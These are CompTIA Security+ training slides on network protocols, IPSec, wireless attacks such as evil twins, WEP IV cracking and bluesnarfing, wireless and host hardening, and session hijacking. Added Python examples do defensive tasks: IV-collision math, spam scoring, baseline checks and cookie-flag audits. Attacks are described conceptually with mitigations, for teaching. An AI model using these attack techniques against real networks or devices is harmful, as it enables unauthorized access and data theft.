SMTP      Simple Mail Transfer Protocol        25                         x
TFTP      Trivial File Transfer Protocol       69                              x
HTTP      Hypertext Transfer Protocol          80                         x    x
POP3      Post Office Protocol v3              110                        x
SFTP      Secure/SSH File Transfer Protocol    115                        x
NetBIOS   Network Basic Input/Output System    137 – name service         x    x
                                               138 – datagram service
                                               139 – session service
IMAP      Internet Message Access Protocol     143                        x
HTTPS     HTTP Secure                          443                        x
FTPS      FTP Secure                           989 – data transfer        x    x
                                               990 – control
IPSec
• IP Security
• Defines a policy but does not dictate the exact implementation
• Options:
–Authentication Header or Encapsulating Security Payload
–Transport Mode or Tunnel Mode

Authentication Header (AH)                        Encapsulating Security Payload (ESP)
Provides authentication                           Does authentication and encryption
Digitally signs the packets for authentication    Adds confidentiality with encryption
and integrity
IPSec
Transport Mode
Encapsulates the IP packet’s payload
Makes a secure connection between two host endpoints
[Diagram: packet layout of IP header (not encrypted), IPSec header and payload; two hosts on LAN1 and LAN2 connected across the Internet]
IPSec
Tunnel Mode
Encapsulates the entire IP packet
Makes a secure “hop” between:
- Two IPSec gateways
- A host and a gateway
[Diagram: packet layout of outer IP header (not encrypted), IPSec header and encapsulated packet; LAN1 and LAN2 joined by a tunnel across the Internet]
Key Terms You Should Know
FTP (File Transfer Protocol): Used to transfer files from local to remote systems
SSH (Secure Shell): A more secure alternative to Telnet. Used for remote access and configuration
SCP (Secure Copy): An unattended file transfer protocol that uses SSH for security
TELNET (Telnet): An unsecure method to create a terminal connection to remote devices
Key Terms You Should Know
SMTP (Simple Mail Transfer Protocol): Used to transfer email
TFTP (Trivial File Transfer Protocol): A connectionless and unsecure file transfer protocol
HTTP (Hypertext Transfer Protocol): Used to display multimedia files on the web
SFTP (Secure/SSH File Transfer Protocol): An extension of SSH that offers file transfer functionality
SNMP (Simple Network Management Protocol): Used to manage and report on network devices
HTTPS (HTTP Secure): Adds SSL/TLS security to the HTTP protocol
Key Terms You Should Know
FTPS (FTP Secure): FTP with added SSL/TLS security
SSL (Secure Sockets Layer): The predecessor to TLS
TLS (Transport Layer Security): Provides encryption and authentication to other protocols
TCP (Transmission Control Protocol): Offers a reliable connection-oriented connection
UDP (User Datagram Protocol): Offers fast connectionless datagram communication
IP (Internet Protocol): Responsible for routing packets across network boundaries
Key Terms You Should Know
IPv6 (Internet Protocol Version 6): Offers longer IP addresses and more security than IPv4
ICMP (Internet Control Message Protocol): Used to send pings and error messages
ARP (Address Resolution Protocol): Resolves IP addresses to network interfaces
IPSec (Internet Protocol Security): An open standard that uses AH and ESP to add security features like authentication, data integrity, and confidentiality
What We Covered
Transport Layer
• TCP
• UDP
Internet Layer
• IP
– IPv4 vs. IPv6
• ICMP
• ARP
IPSec
Application Layer
• FTP
• SSH and SCP
• Telnet
• SMTP
• DNS
• TFTP
• HTTP
• SFTP
• SNMP
• HTTPS
• FTPS
• SSL and TLS
CompTIA Security+ Training Instructor: Lisa Szpunar
Attacks on Wireless Networks
In This Lesson:
Rogue Access Points
Evil Twin
Wardriving
Warchalking
IV Attack
Packet Sniffing
Attacks on Bluetooth
• Bluejacking
• Bluesnarfing
Interference
Exam Objectives: 3.4 Analyze and differentiate among types of wireless attacks
Rogue Access Points
• A wireless access point that has not been authorized
• With extended access an attacker can:
–Run key cracking software
–Create an evil twin
–Establish a Man-in-the-Middle
Rogue AP Mitigation
• Use an intrusion detection system to report a new AP, or
• Regularly audit your environment manually to find them
– Have a baseline of all the authorized AP equipment
Evil Twin
• An access point that looks like it is legitimate
–Could use spoofed MAC addresses
• Entices users to connect through it
–Stronger signal
–Friendly name
–Interferes with the signal of the legitimate AP
• Analyzes all transmissions that go through it
Evil Twin Mitigation
• Educate users about bogus APs at “Wi-Fi hotspots”
• Regularly audit your environment manually to find them
Wardriving
Looking for open access points or wireless networks with weak encryption
Driving around with:
• A laptop with a NIC set to promiscuous mode
• Often homemade equipment
• Specialized software
Once a network is found:
• Run sniffers or key cracking programs
• Use it for free internet access
Wardriving Mitigation
• Use wardriving as a tool to find the open APs before the attackers do
• Watch for unfamiliar cars driving or parking near your buildings
• Look for warchalking symbols
• Don’t have open access points!
Warchalking
• Using symbols to mark the location of wireless network access points
• For future personal use or to let other wardrivers know
• Warchalking symbols:
–Open Node: labelled with the SSID and the bandwidth
–Closed Node: labelled with the SSID
–WEP Node: marked with a W and labelled with the SSID, the access contact, and the bandwidth
IV Attack
• Initialization vector
–Supposed to be used to reduce predictability and repeatability of encryption keys
• The IV is vulnerable to attack if it is
–Too short
–Exchanged in cleartext
–Often repeated
• IV attacks are used to crack Wired Equivalent Privacy (WEP)
–WEP uses RC4 with only a 24-bit IV, so IVs repeat
–The attacker’s cracking program examines the repeating IV datastreams to deduce the secret key
[Diagram: Key + IV → Keystream; Message + Keystream → Ciphertext, which is transmitted together with the IV]
Packet Sniffing
• Installing a sniffer on a wireless network can happen from outside the walls of your building
What can Eavesdroppers See?
• POP3 email usernames and passwords
• Web-based email messages if no encryption is used
• FTP usernames and passwords and data
• HTTP connections
• Instant messages
Packet Sniffing Mitigation
• Have layers of protection
– Use strong wireless encryption, don’t broadcast the SSID, and other wireless hardening best practices
– Independently secure all services
• Turn on optional encryption
• Use VPNs
• Don’t use unsecure protocols
• Use sniffers and other network monitoring tools
Attacks on Bluetooth
• Bluejacking
–Unsolicited messages over Bluetooth (Bluetooth spam)
–Can happen when Bluetooth on a device is set to discoverable
• Bluesnarfing
–Unauthorized access to a device through Bluetooth
–Theft of:
• Contact lists, calendar info, email, texts, images, or video
Bluetooth Attack Mitigation
• Turn Bluetooth off when not in use
• When Bluetooth is turned on make sure it is not discoverable
• Disable Bluetooth on devices that are known to be vulnerable to bluesnarfing
Interference
• Wireless signals can be corrupted or interfered with
• To do this on purpose is illegal in the US
• There are numerous devices that can cause interference
• Spectrum analyzers are available to see if an attacker (or your own equipment) is interfering with your wireless network
Dealing with Wireless Interference
• Move your access point
• Change the frequency of the access point
• Boost the access point’s signal
• Find the source of the interference
• Notify law enforcement if the interference is intentional
Key Terms You Should Know
Rogue Access Points: An unauthorized access point to your wireless network
Evil Twin: An access point that entices users to connect through it by spoofing a legitimate device or offering exceptional signal strength
Wardriving: Trying to discover unprotected or lightly protected wireless networks to use for free or attack
Warchalking: Using symbols to share knowledge about the location and details of access points
Key Terms You Should Know
IV Attack: Using initialization vectors that are passed in cleartext to crack weak encryption like WEP
Packet Sniffing: Passively analyzing the communications across a network
Bluejacking: Unwanted spam messages sent over Bluetooth
Bluesnarfing: Unauthorized access and theft of data over Bluetooth
Interference: Degrading or completely jamming wireless signals
What We Covered
Rogue Access Points
Evil Twin
Wardriving
Warchalking
IV Attack
Packet Sniffing
Attacks on Bluetooth
• Bluejacking
• Bluesnarfing
Interference
CompTIA Security+ Training Instructor: Lisa Szpunar
Securing Wireless Networks
In This Lesson:
WEP
WPA and WPA2
TKIP
CCMP
WAP
EAP, LEAP, and PEAP
Securing Wireless Routers and Access Points
• SSID Broadcast
• MAC Filter
• Antenna Placement and Power Level Controls
Exam Objectives: 1.6 Implement wireless networks in a secure manner
IEEE 802.11x Wireless Standards
Standard   Bandwidth      Frequency          Compatibility
802.11     1 or 2 Mbps    2.4GHz             802.11
802.11a    < 54Mbps       5GHz               802.11a
802.11b    < 11Mbps       2.4GHz             802.11b
802.11g    < 54Mbps       2.4GHz             802.11g/b
802.11n    < 600Mbps      2.4GHz and 5GHz    802.11n/g/b
802.11i    A security amendment that outlines WPA2
For more information: www.standards.ieee.org
WEP
• Wired Equivalent Privacy
• An older weak 802.11 wireless encryption protocol for WLANs
–Uses the RC4 stream cipher encryption algorithm
–Attempts to do confidentiality and authentication
–Uses a checksum for some integrity
• Vulnerable to IV attacks
–Can be cracked in a few minutes with easily obtainable software
WEP Best Practices
• Only use WEP if newer protocols are not supported
• Place a WEP access point outside your firewall and then VPN in
WEP
• The access points and clients must share a secret key
• Authentication
–Open Authentication
• Knowing the SSID is the only thing clients need to associate with the AP
• The WEP keys can still be used to encrypt data
– Clients need to have the WEP key in this case
WEP
• The access points and clients must share a secret key
• Authentication
–Shared Key Authentication
• Uses a 4 step challenge-response handshake
• Attackers can figure out the key from this handshake
Handshake:
1. Client sends an Authentication Request
2. AP sends a Cleartext Challenge
3. Client encrypts the cleartext with the WEP key and sends the Ciphertext
4. AP decrypts and matches the text to the original, then sends a Positive Reply
WPA and WPA2
• Wi-Fi Protected Access
• More secure than WEP alone
• Based on the 802.11i standard

WPA                                       WPA2
Does most of the 802.11i standard         Full implementation of the 802.11i standard
TKIP used for extra encryption layer      CCMP used for extra security
RC4 encryption algorithm still used       Uses the AES encryption algorithm
Backward compatible with WEP              Not backward compatible with WEP
TKIP
• Temporal Key Integrity Protocol
• Wraps a 128-bit layer of encryption around WEP
• Uses a second key based on the MAC address of the machine and the serial number of the packet
• Mixes this additional key with the initialization vector for a per-packet key
• Is backward compatible with WEP
• Unfortunately TKIP is also quickly crackable
CCMP
• Counter Mode with Cipher Block Chaining Message Authentication Code Protocol
• Used by WPA2
• 128-bit AES encryption
• 48-bit initialization vector
• Much reduced vulnerability to cracking and replay attacks
• Offers real confidentiality, authentication, and integrity
• Use WPA2 and CCMP!
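Why WEP’s 24-bit IV repeats quickly while CCMP’s 48-bit IV effectively never does, worked through with the birthday bound; this is an added example for the IV Attack and CCMP slides, not part of the original course, and the packet counts and rates in it are constructed.

```python
"""Why a 24-bit IV (WEP) repeats and a 48-bit IV (CCMP) effectively does not.

Added example, not from the original slides. It applies the birthday bound to the
IV space (probability that some IV value is reused after n randomly chosen IVs)
and shows how long a counter-style IV lasts at a given packet rate. The packet
counts and rates are constructed for illustration.
"""
import math


def iv_reuse_probability(iv_bits, packets):
    """Exact probability that at least one IV repeats among `packets` random IVs."""
    space = 2 ** iv_bits
    if packets > space:
        return 1.0                       # pigeonhole: a repeat is certain
    # Multiply (1 - i/space) for i = 0..packets-1 in log space to avoid underflow.
    log_no_repeat = sum(math.log1p(-i / space) for i in range(packets))
    return 1.0 - math.exp(log_no_repeat)


def packets_for_half_chance(iv_bits):
    """Birthday approximation: n ≈ sqrt(2 N ln 2) packets for a 50% chance of a repeat."""
    return math.ceil(math.sqrt(2 * (2 ** iv_bits) * math.log(2)))


def hours_to_exhaust(iv_bits, packets_per_second):
    """Time until a counter-style IV has used every value once and must wrap."""
    return (2 ** iv_bits) / packets_per_second / 3600


def compare(packets=4823, packets_per_second=500):
    """Side-by-side figures for the WEP (24-bit) and CCMP (48-bit) IV sizes."""
    return {
        bits: {
            "p_repeat_after_packets": iv_reuse_probability(bits, packets),
            "packets_for_50pct": packets_for_half_chance(bits),
            "hours_to_exhaust": hours_to_exhaust(bits, packets_per_second),
        }
        for bits in (24, 48)
    }


if __name__ == "__main__":
    for bits, row in compare().items():
        print(f"{bits}-bit IV: P(repeat after 4823 packets) = "
              f"{row['p_repeat_after_packets']:.2e}, 50% chance after "
              f"{row['packets_for_50pct']} packets, counter exhausted after "
              f"{row['hours_to_exhaust']:.3g} h at 500 pkt/s")
```

At a constructed 500 packets per second the 24-bit space is used up in about nine hours, and a repeat is already even odds after a few thousand packets; the 48-bit space takes thousands of years.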
WAP
• Wireless Application Protocol
• Used to provide mobile devices (phones, tablets) with internet connection
• Equivalent to TCP/IP for wireless devices
• Wireless Transport Layer Security (WTLS)
–Provides authentication, encryption, and data integrity
–Secures the communication between the WAP mobile device and the WAP server
–Similar to TLS
EAP, PEAP, and LEAP
• Extensible Authentication Protocol
• A set of authentication frameworks for wireless networks
• LEAP and PEAP are types of EAP
Lightweight Extensible Authentication Protocol (LEAP)
• Created by Cisco – did not have Windows support
• Requires mutual authentication
• Easy to set up – no digital certificates
• Weak
– Passwords only, no digital certificates
–Vulnerable to dictionary attacks
–Cleartext transmissions
Protected Extensible Authentication Protocol (PEAP)
• Replaces LEAP
• Created by Cisco, Microsoft, and RSA together
• One digital certificate is used on the authentication server
• The authentication process is encrypted within a TLS tunnel between the client and the server
Securing Wireless Routers and Access Points
Securing Wireless Routers and Access Points Best Practices
• Change the default admin account and password
• Change the SSID and turn off SSID broadcast
• Consider using MAC filtering
• Work with antenna placement and power level controls
• Configure the strongest encryption and authentication available
• Change keys and passwords often
• Keep your firmware patched and up-to-date
• Only use wireless when absolutely necessary and for users that absolutely need it
• Use additional layers of security like pre-authentication, IPSec tunneling, network separation, and host security
Change the SSID and Turn off SSID Broadcast
• SSID
–Service Set Identifier
–Name of the wireless LAN
• Change the default SSID
–Something unique
–No identifiable information in the name
• Hide the SSID from being broadcast
–This keeps honest people honest
–Security through obscurity
–The SSID can still be sniffed
Consider Using MAC Filtering
• A list of MAC addresses for known trusted devices
–The 48-bit unique identifier for the network interface on a physical device
• Only those on the list can connect to the network
• You can blacklist certain MAC addresses too
• Requires manual administration
–Need to update the list for new or guest devices
–Not recommended for larger environments
• MAC addresses can easily be spoofed
–Only use as one layer of protection
Work with Antenna Placement and Power Level Controls
• Antenna Placement
–Not near outside walls or windows
–Not near other networks
–Find and avoid obstructions and interference
–Consider multiple access points on different channels
–Some antennas allow you to change the direction they point
• Power Level Controls
–Turn the power as low as possible while still covering your users
–Might need to play with this to get it perfect
Key Terms You Should Know
Wired Equivalent Privacy (WEP): A weak protocol used for encryption on 802.11 WLANs
Wi-Fi Protected Access (WPA): A weak wireless protocol that uses RC4 with TKIP
Wi-Fi Protected Access 2 (WPA2): Based on the full 802.11i standard, a more secure wireless protocol that uses AES encryption with CCMP
Key Terms You Should Know
Temporal Key Integrity Protocol (TKIP): An extra layer of encryption for WEP that uses a new keyspace for every packet
Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP): Encryption and authentication used by WPA2 that provides confidentiality, authentication, and integrity
Wireless Application Protocol (WAP): The protocol stack used by wireless devices. Security is done at the WTLS
Key Terms You Should Know
Extensible Authentication Protocol (EAP): A set of 5 authentication frameworks for wireless networks
Lightweight Extensible Authentication Protocol (LEAP): An easy to set up version of EAP that uses passwords for authentication
Protected Extensible Authentication Protocol (PEAP): A version of EAP that uses digital certificates
Service Set Identifier (SSID): The name of the wireless network
What We Covered
WEP
WPA and WPA2
TKIP
CCMP
WAP
EAP, LEAP, and PEAP
Securing Wireless Routers and Access Points
• SSID Broadcast
• MAC Filter
• Antenna Placement and Power Level Controls
CompTIA Security+ Training Instructor: Lisa Szpunar
Host Security
In This Lesson:
Securing Workstations
• Antimalware
• Host-based Firewalls
• Updates and Patch Management
• Disabling Unused Services
• Users and Accounts
• Virtualization
• Host Software Baselining
Securing Servers
Securing Mobile Devices
Exam Objectives: 4.2 Carry out appropriate procedures to establish host security
Securing Workstations
Antimalware
• Antivirus and antispyware
–Software that is designed to identify, prevent, and remove/quarantine malicious code
–Antispyware is often included with antivirus
–Study and understand your tool’s licensing
• Methods
–Known virus/spyware signatures
–Behavior based
–Real time prevention that monitors all incoming files
–Full scans look for malware that has already been installed
Antivirus and Antispyware Best Practices
• A trustworthy tool should be installed on every workstation
• Choose a tool that does real time monitoring
• Configure the software to automatically update
• Schedule full scans to run on a regular basis
• Educate your users on how to interact with prompts from your antimalware software
Antimalware
• Antispam
–Determines if a message is likely to be spam and then labels, quarantines, or blocks it
• Blacklist
• Rule-based
• Bayesian
–Host-based
• Integrated with your email client
• Part of a complete antimalware package
–Not often a host-based solution
• Done by your email system, a third party service, or an appliance
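The Bayesian method from the antispam slide, worked through as an added example that is not part of the original course: a small naive Bayes classifier trained on constructed messages, with its score mapped to the label/quarantine/block actions the slide lists. The training messages and thresholds are constructed, not a real corpus.

```python
"""Bayesian spam scoring, the third antispam method on the slide above.

Added example, not from the original slides: a naive Bayes classifier trained on
constructed messages, with the score mapped to the three actions the slide lists
(label, quarantine, block). Training data and thresholds are constructed.
"""
import math
import re
from collections import Counter

TOKEN = re.compile(r"[a-z0-9$!]+")


def tokens(text):
    """Distinct lower-cased words in a message (presence, not frequency)."""
    return set(TOKEN.findall(text.lower()))


class BayesianSpamFilter:
    def __init__(self):
        self.spam_docs = 0
        self.ham_docs = 0
        self.spam_tokens = Counter()   # spam messages containing each word
        self.ham_tokens = Counter()    # legitimate messages containing each word

    def train(self, text, is_spam):
        toks = tokens(text)
        if is_spam:
            self.spam_docs += 1
            self.spam_tokens.update(toks)
        else:
            self.ham_docs += 1
            self.ham_tokens.update(toks)

    def spam_probability(self, text):
        """P(spam | words) by naive Bayes with add-one smoothing, in log space."""
        total = self.spam_docs + self.ham_docs
        log_spam = math.log(self.spam_docs / total)
        log_ham = math.log(self.ham_docs / total)
        known = set(self.spam_tokens) | set(self.ham_tokens)
        for tok in tokens(text) & known:      # words never seen carry no evidence
            log_spam += math.log((self.spam_tokens[tok] + 1) / (self.spam_docs + 2))
            log_ham += math.log((self.ham_tokens[tok] + 1) / (self.ham_docs + 2))
        return 1.0 / (1.0 + math.exp(log_ham - log_spam))

    def action(self, text, label_at=0.6, quarantine_at=0.85, block_at=0.98):
        """Map the score to the slide's responses; below label_at it is delivered."""
        p = self.spam_probability(text)
        if p >= block_at:
            return "block"
        if p >= quarantine_at:
            return "quarantine"
        if p >= label_at:
            return "label"
        return "deliver"


def trained_filter():
    """Filter trained on a constructed eight-message corpus."""
    f = BayesianSpamFilter()
    for msg in ("win a free prize claim now",
                "free money click now to claim",
                "claim your free prize today",
                "limited offer win money now"):
        f.train(msg, is_spam=True)
    for msg in ("meeting notes from the project review",
                "can you review the budget before the meeting",
                "project status update for tomorrow",
                "lunch tomorrow after the review"):
        f.train(msg, is_spam=False)
    return f


if __name__ == "__main__":
    f = trained_filter()
    for msg in ("claim your free prize now", "notes from the project meeting"):
        print(f"{f.spam_probability(msg):.3f}  {f.action(msg):10s} {msg}")
```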
Antimalware
• Pop-up Blockers
–Block pop-up windows from appearing over or under your browser window
–Built into your browser
• Configure it to be off for any work-related websites that use legitimate pop-ups
• Have the blocker turned on for every other website
–Configure pop-up blockers and other browser-based tools for every workstation
• Content inspection
• URL filtering
Host-based Firewalls
• Filters all incoming traffic
• Should be on every workstation, especially mobile computers
• There are free firewalls included with current operating systems
• Customized protection
–Applications installed
–Configurations
• Protects the workstation from other users on the same network
Host-based Firewall Best Practices
• Keep it turned on and configured on every workstation
• Set the firewall to automatically update
• Configure according to the needs of the machine and its user
• Educate your users on how to interact with prompts from the firewall
• Remember to turn the firewall back on if you turned it off during troubleshooting
• Consider using with a host-based IDS system
Updates and Patch Management
• Patches
–A quick fix that is not meant to be permanent
–A full update or new software version will fully fix the issue
• Hotfixes
–A bug fix or other change applied without disrupting normal operation
• Service Packs/Support Packs
–A group of many different fixes
–Can add functionality
• Consider update automation tools
Update Best Practices
• Configure the OS to update automatically
• Keep informed so you can install non-automatic updates
• Perform a backup before installing any updates
• Document updates performed
Updates and Patch Management
Patch management cycle: Plan → Test → Install → Audit → Document
Disabling Unused Services
• Shrink the attack surface!
• Remove/Disable Unneeded
–Applications
–Programs
–Ports
–Services
• Do not permit users to install applications that are not needed for their job
Users and Accounts
• User accounts
–Not also the workstation’s admin
–No registry access
–Remove unused local accounts
• Least privilege for users’ access to resources and data
• Strong policies
–Passwords
–Acceptable use
• Educate your users
Virtualization
[Diagram: virtual workstations/servers running on a hypervisor on a physical host, connected through physical networking devices]
Do provide the same security as you do for physical hosts
Single point of failure; single point of attack
Host Software Baselining
• A standardized minimal level of security that all hosts must comply with
–Services and applications installed / disabled
–Security updates applied
–Firewall and antimalware configured
• Document each system after it is hardened and meets the baseline
• Frequently compare workstations to this documented baseline state to see if they still comply
–Use configuration automation tools
• Update your baseline when changes are made
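One way to do the baseline comparison the slide describes, as an added example that is not part of the original course: the baseline records required and forbidden services, required security updates and firewall/antimalware settings, and the checker lists every deviation. The baseline, the patch identifiers (obvious placeholders) and the host snapshots are all constructed.

```python
"""Checking a host snapshot against a documented software baseline.

Added example, not from the original slides. The baseline, the placeholder patch
identifiers and the host snapshots are constructed for illustration; a real
deployment would export the snapshot from a configuration automation tool.
"""

BASELINE = {
    "required_services": {"firewall", "antimalware", "update-agent"},
    "forbidden_services": {"telnet", "tftp", "remote-registry"},
    "required_patches": {"PATCH-PLACEHOLDER-001", "PATCH-PLACEHOLDER-002"},
    "settings": {
        "firewall.enabled": True,
        "antimalware.realtime": True,
        "antimalware.auto_update": True,
    },
}


def compare_to_baseline(host, baseline=BASELINE):
    """Return a list of (severity, finding) tuples; an empty list means compliant."""
    findings = []
    running = set(host["services"])
    for svc in sorted(baseline["required_services"] - running):
        findings.append(("high", f"required service not running: {svc}"))
    for svc in sorted(running & baseline["forbidden_services"]):
        findings.append(("high", f"forbidden service running: {svc}"))
    for patch in sorted(baseline["required_patches"] - set(host["patches"])):
        findings.append(("medium", f"security update missing: {patch}"))
    for key, expected in baseline["settings"].items():
        actual = host["settings"].get(key)
        if actual != expected:
            findings.append(("medium", f"setting {key} is {actual!r}, baseline requires {expected!r}"))
    # Software that is neither required nor forbidden is reported at low severity
    # so the baseline itself can be updated once the change is approved.
    for svc in sorted(running - baseline["required_services"] - baseline["forbidden_services"]):
        findings.append(("low", f"service not covered by the baseline: {svc}"))
    return findings


def is_compliant(host, baseline=BASELINE):
    """Only high and medium findings break compliance."""
    return not any(sev in ("high", "medium") for sev, _ in compare_to_baseline(host, baseline))


# Constructed host snapshots, as a configuration tool might export them.
COMPLIANT_HOST = {
    "name": "ws-01",
    "services": ["firewall", "antimalware", "update-agent"],
    "patches": ["PATCH-PLACEHOLDER-001", "PATCH-PLACEHOLDER-002"],
    "settings": {"firewall.enabled": True, "antimalware.realtime": True,
                 "antimalware.auto_update": True},
}

DRIFTED_HOST = {
    "name": "ws-02",
    "services": ["firewall", "antimalware", "telnet", "print-spooler"],
    "patches": ["PATCH-PLACEHOLDER-001"],
    "settings": {"firewall.enabled": True, "antimalware.realtime": False,
                 "antimalware.auto_update": True},
}

if __name__ == "__main__":
    for host in (COMPLIANT_HOST, DRIFTED_HOST):
        print(host["name"], "compliant" if is_compliant(host) else "DRIFTED")
        for sev, msg in compare_to_baseline(host):
            print(f"  [{sev}] {msg}")
```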
Securing Servers
Securing Servers
• Everything from the workstation security section
–Disable unused services, ports, and applications
–Have antimalware and a host based firewall
–Create and maintain security baselines
• Consider the server’s purpose when designing security
–Intrusion protection system
• Administrator accounts
–Have super strong passwords
–Are only known by people who need them
–Never log on with admin/service account when not doing administration tasks
Securing Mobile Devices
Securing Mobile Devices
• Strong Passwords
–A thief with your device has unlimited time to try a brute force attack
–A long string of letters, numbers, special characters, and no real words
• Screen Lock
–When a device is inactive for a short time the screen times out and will not display again until a password is entered
Securing Mobile Devices
• Device Encryption
–A stolen device is worthless to the thief if it is encrypted
–Not accessible without a password
–The stronger the encryption the more the performance is affected
–Choose a tool that meets your needs
• Which platforms
• Key management
• Cost
• Voice Encryption
–Encrypts the communications of mobile phones
–Will affect the performance and battery life of your device
Securing Mobile Devices
• GPS Tracking
–If a device has GPS functionality (enabled) you can use it to find a lost device
–The device needs a GPS tracking app installed and configured
• Remote Wipe/Sanitation
–Offers the ability to erase the device if it has been lost or stolen
–A device with a remote wipe tool configured can be sanitized from a web browser or management console
–An added feature to messaging solutions
• Microsoft Exchange
• Google Apps for Business
Securing Mobile Devices
• Mobile devices should be treated as an entrance point for malware and attacks
• Avoid mobile devices connecting to the LAN
–Any connections need to be filtered
• Educate users
–Vulnerabilities of mobile devices
–Keeping personal and company data separate
Key Terms You Should Know
Antimalware: Software that prevents, detects, quarantines, and removes malware from the system it is protecting. This includes antivirus, antispyware, and antispam software
Antivirus: A type of antimalware that prevents, detects, quarantines, and removes viruses, trojans and other malicious code from the system it is protecting
Antispyware: A type of antimalware that prevents, detects, quarantines, and removes spyware from the system it is protecting
Key Terms You Should Know
Antispam: Uses different methods to filter incoming messages and label, quarantine, or block those that appear to be spam
Baselining: Matching systems to a minimum standard of security actions and configurations and making sure those systems stay compliant
What We Covered
Securing Workstations
• Antimalware
• Host-based Firewalls
• Updates and Patch Management
• Disabling Unused Services
• Users and Accounts
• Virtualization
• Host Software Baselining
Securing Servers
Securing Mobile Devices
CompTIA Security+ Training Instructor: Lisa Szpunar
Securing Applications
In This Lesson:
Application Attacks and Vulnerabilities
Cookies
Session Hijacking
Header Manipulation
Cross-site Scripting
Cross-site Request Forgery
Injection Attacks
Buffer Overflow
Java Applets and JavaScript
ActiveX Controls
Malicious Add-ons
Attachments
Zero Day Exploits
In This Lesson:
Exam Objectives:
3.5 Analyze and differentiate among types of application attacks
4.1 Explain the importance of application security
Application Security
Secure Coding Concepts
Fuzzing
Application Hardening
• Patch Management
• Configuration Baseline
Application Attacks and Vulnerabilities
Cookies
• Little text files that contain information about you
• Created by websites that you visit and stored locally on your machine
• Used for
–Session IDs
–Browsing or shopping history
–Shopping cart contents
–Personal information or preferences
• A stolen cookie is stolen information
–A privacy concern
–A security issue
• Browser settings can disallow cookies from first or third parties
• Browser add-ons can manage cookies on a cookie-by-cookie basis
Session Hijacking
• A session token can be stolen (or guessed) and then replayed
–Often a cookie
• Used to carry out MitM and replay attacks
• A sniffer can capture session information
• Cross-site scripting can steal cookies
Session Hijacking Prevention
• Log out of all websites while not using them
• Do not allow persistent login cookies
• Encrypt sessions when possible
• Web server requires secondary authentication or re-authentication for performing critical functions
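A server-side check for the cookie properties the prevention list calls for, as an added example that is not part of the original course: it reports session cookies with no Secure flag (sent unencrypted, so a sniffer can capture them), no HttpOnly flag (readable by script, which is how cross-site scripting steals them), or a persistent lifetime. The header values and the list of session cookie names are constructed.

```python
"""Auditing Set-Cookie headers against the session hijacking prevention list.

Added example, not from the original slides. Header values and the set of cookie
names treated as login/session cookies are constructed for illustration.
"""


def parse_set_cookie(header_value):
    """Split 'name=value; Attr; Attr=value' into (name, {attr_lower: value})."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return name, attrs


def audit_set_cookie(header_value, session_cookie_names=("sessionid", "auth", "remember_me")):
    """Return (cookie name, list of problems) for one Set-Cookie header."""
    name, attrs = parse_set_cookie(header_value)
    problems = []
    if "secure" not in attrs:
        problems.append("no Secure flag: sent over plain HTTP, so a sniffer can capture it")
    if "httponly" not in attrs:
        problems.append("no HttpOnly flag: script running in the page can read it")
    persistent = "expires" in attrs or "max-age" in attrs
    if persistent and name.lower() in session_cookie_names:
        problems.append("persistent login cookie: survives closing the browser")
    return name, problems


def audit_response(headers):
    """headers: list of (field-name, value) pairs; returns {cookie_name: [problems]}."""
    report = {}
    for field, value in headers:
        if field.lower() == "set-cookie":
            name, problems = audit_set_cookie(value)
            report[name] = problems
    return report


# Constructed response headers: one weak session cookie, one hardened cookie,
# one persistent "remember me" cookie and one harmless preference cookie.
CONSTRUCTED_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "SESSIONID=c0nstructed; Path=/"),
    ("Set-Cookie", "AUTH=c0nstructed; Path=/; Secure; HttpOnly"),
    ("Set-Cookie", "remember_me=c0nstructed; Path=/; Max-Age=2592000; Secure; HttpOnly"),
    ("Set-Cookie", "theme=dark; Path=/; Max-Age=31536000; Secure; HttpOnly"),
]

if __name__ == "__main__":
    for cookie, problems in audit_response(CONSTRUCTED_HEADERS).items():
        print(cookie, "OK" if not problems else "")
        for p in problems:
            print("  -", p)
```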
CompTIA Security+ Training
Securing Applications
• Changes values in HTTP headers
– In an HTTP request
– Force into as HTTP response
• Used to carry out other attacks and spoofs
–Cache-poisoning, cross-site request forgery, etc…
• There are tools available to easily manipulate headers
Header Manipulation
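The two slides above describe the problem from the attacker's side. Added example (this editor's code, not the course's): a Python sketch of the matching server-side defences, an unguessable session token, a Set-Cookie header carrying the Secure, HttpOnly and SameSite flags, a header builder that refuses CR/LF so echoed input cannot split the response, and a session store that demands recent re-authentication before a critical function. The SessionStore design and the 300-second re-authentication window are assumptions made for the example.

```python
import secrets
from typing import Dict, Optional


def new_session_token() -> str:
    # 32 bytes from the OS CSPRNG; sequential or low-entropy tokens are
    # what lets an attacker guess a session instead of stealing it
    return secrets.token_urlsafe(32)


def header_value_is_safe(value: str) -> bool:
    # CR or LF inside a header value lets an attacker end this header and
    # inject new ones (or a second response body): HTTP response splitting
    return "\r" not in value and "\n" not in value


def safe_header_value(value: str) -> str:
    if not header_value_is_safe(value):
        raise ValueError("CR/LF not allowed in HTTP header values")
    return value


def build_set_cookie(name: str, value: str, max_age: Optional[int] = None) -> str:
    parts = [f"{safe_header_value(name)}={safe_header_value(value)}"]
    if max_age is not None:
        parts.append(f"Max-Age={int(max_age)}")
    # Secure:   only sent over TLS, so a sniffer on the wire never sees it
    # HttpOnly: not exposed to document.cookie, so XSS cannot read it
    # SameSite: not attached to cross-site requests, which blunts CSRF
    parts += ["Path=/", "Secure", "HttpOnly", "SameSite=Strict"]
    return "; ".join(parts)


def build_redirect(location: str) -> str:
    # A "return to" parameter echoed into Location is the classic
    # header-injection point; validate before emitting
    return f"Location: {safe_header_value(location)}"


class SessionStore:
    """Server-side session table (assumed design for this example)."""

    def __init__(self, reauth_window: int = 300):
        self._sessions: Dict[str, Dict[str, object]] = {}
        self.reauth_window = reauth_window  # seconds a login counts as "recent"

    def login(self, user: str, now: float) -> str:
        # A fresh token on every login also defeats session fixation
        token = new_session_token()
        self._sessions[token] = {"user": user, "authenticated_at": now}
        return token

    def user_for(self, token: str) -> Optional[str]:
        sess = self._sessions.get(token)
        return str(sess["user"]) if sess else None

    def requires_reauth(self, token: str, now: float) -> bool:
        # Critical functions (password change, transfer) demand a recent
        # authentication even when the session cookie itself is valid
        sess = self._sessions.get(token)
        if sess is None:
            return True
        return now - float(sess["authenticated_at"]) > self.reauth_window

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)
```

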